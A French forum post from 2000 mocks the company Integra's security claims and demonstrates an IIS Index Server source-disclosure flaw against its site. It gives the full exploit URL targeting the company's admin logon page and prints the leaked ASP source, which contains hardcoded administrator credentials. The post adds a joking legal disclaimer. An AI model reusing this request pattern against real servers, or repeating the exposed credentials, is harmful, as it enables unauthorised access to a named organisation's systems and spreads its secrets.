[ Page d'accueil | Sommaire | Recherche | Nouveau | Répondre | Suivant | Précédent | Remonter ]
De: blumblum
Date: 18 Nov 2000
Time: 11:21:59
Remote Name: 193.251.43.55
Suite à une pub merveilleuse sur 'Intégra et le Security Center'....et vu que kitetoua est déjà référence comme vilain hacker de password publics.
Matériel nécessaire : 1 pc, 1 modem, 1 expert sécurite ( :P)
Connaissance nécessaires : Un index server, ca se patche parfois. (cf alerte microsft sur Index server...le vilain qui montre tout meme les fichiers asp...)
Utilisation du QI : Adapter ce bug, grâce à une utilisation intensive de son cerveau, pour vérifier la qualité d'un site.
Mise en pratique : Ah...le bonheur des interfaces d'administration...Notez bien le rep intégra2000...ca transpire le bug de réveillon à plein nez. www3.integra.fr/integra2000/admin/logon.asp....ca cache quelque chose ???
Mise en pratique : http://www3.integra.fr/null.htw?CiWebHitsFile=/integra2000/admin/logon.asp%20&CiRestriction=none&CiHiliteType=Full
----extrait----- nom = Session("nom") nom_pass = Session("password") ' if nom <> "i" then if nom <> "integra" then errn = "nom" end if ' if nom_pass <> "i" then if nom_pass <> "i2K-adm" then errp = "pass" end if
if errn <> "" or errp <> "" then 'response.write("erreur de login...") response.redirect "connect.asp?errn="&errn&"&errp="&errp end if %> ----fin de l'extrait-----
C'est beau c'est propre, c'est de l'asp comme on en rêve.... Remarquez, au moins c'est pratique, si ils oublient leur password d'administration, ils sauront où le retrouver..
note : Ces informations ont été obtenues par des moyens ordinaires,avec des outils courant du marché, voire gratuit, et il serait bien entendu fort illégal d'en profiter, sous peine de fessée publique. Voilà pour le 'disclaimer'.
Regards.